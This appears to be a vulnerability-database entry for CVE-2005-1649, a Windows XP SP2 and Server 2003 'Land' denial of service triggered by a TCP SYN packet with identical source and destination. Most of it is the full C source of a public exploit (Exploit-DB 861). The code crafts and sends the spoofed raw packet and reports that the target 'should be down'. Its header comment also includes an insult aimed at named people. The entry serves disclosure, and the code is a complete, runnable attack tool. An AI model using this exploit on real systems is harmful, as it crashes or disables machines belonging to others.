CVE-2005-1649 : Detail

13.33%V4
Network
2005-05-18 02h00 +00:00
2005-05-25 07h00 +00:00

CVE Descriptions

The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016).

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 861

Publication date : 2005-03-06 23h00 +00:00
Author : RusH
EDB Verified : Yes

/* Added Line #1 - BSD_SOURCE!!!! /str0ke */
#define _BSD_SOURCE

#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
    Windows Server 2003 and XP SP2 remote DoS exploit
    Tested under OpenBSD 3.6 at WinXP SP 2
    Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
    (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
    Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
    Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
    All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
    u_short *w = addr;
    int i = len;
    int sum = 0;
    u_short answer;

    while (i > 0)
    {
        sum += *w++;
        i-=2;
    }
    if (i == 1) sum += *(u_char *)w;
    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    return (~sum);
}

int main(int argc, char ** argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    struct _pseudoheader {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        u_char zero;
        u_char protocol;
        u_short length;
    } pseudoheader;
    struct ip * iph;
    struct tcphdr * tcph;
    int mysock;
    u_char * packet;
    u_char * pseudopacket;
    int on = 1;

    if( argc != 3)
    {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
        return EX_USAGE;
    }
    if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
    {
        perror("malloc()\n");
        return EX_OSERR;
    }
    inet_aton(argv[1], &src);
    inet_aton(argv[1], &dst);

    iph = (struct ip *) packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;
    iph->ip_src = src;
    iph->ip_dst = dst;

    tcph = (struct tcphdr *)(packet +sizeof(struct ip));
    tcph->th_sport = htons(atoi(argv[2]));
    tcph->th_dport = htons(atoi(argv[2]));
    tcph->th_seq = ntohl(rand());
    tcph->th_ack = rand();
    tcph->th_off = 5;
    tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
    tcph->th_win = htons(512);
    tcph->th_sum = 0;
    tcph->th_urp = 0;

    pseudoheader.source_addr = src;
    pseudoheader.destination_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr));

    if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
    {
        perror("malloc()\n");
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
    tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));

    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if(!mysock)
    {
        perror("socket!\n");
        return EX_OSERR;
    }
    if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
        perror("setsockopt");
        shutdown(mysock, 2);
        return EX_OSERR;
    }

    sin.sin_family = PF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(80);

    if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
        perror("sendto()\n");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    printf("Packet sent. Remote machine should be down.\n");
    shutdown(mysock, 2);
    return EX_OK;
}

// milw0rm.com [2005-03-07]

Products Mentioned

Configuration 0

Microsoft>>Windows_2003_server >> Version datacenter_64-bit
Microsoft>>Windows_2003_server >> Version enterprise
Microsoft>>Windows_2003_server >> Version enterprise_64-bit
Microsoft>>Windows_2003_server >> Version r2
Microsoft>>Windows_2003_server >> Version standard
Microsoft>>Windows_2003_server >> Version web
Microsoft>>Windows_xp >> Version *

References

http://www.vupen.com/english/advisories/2005/0559
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/13658
Tags : vdb-entry, x_refsource_BID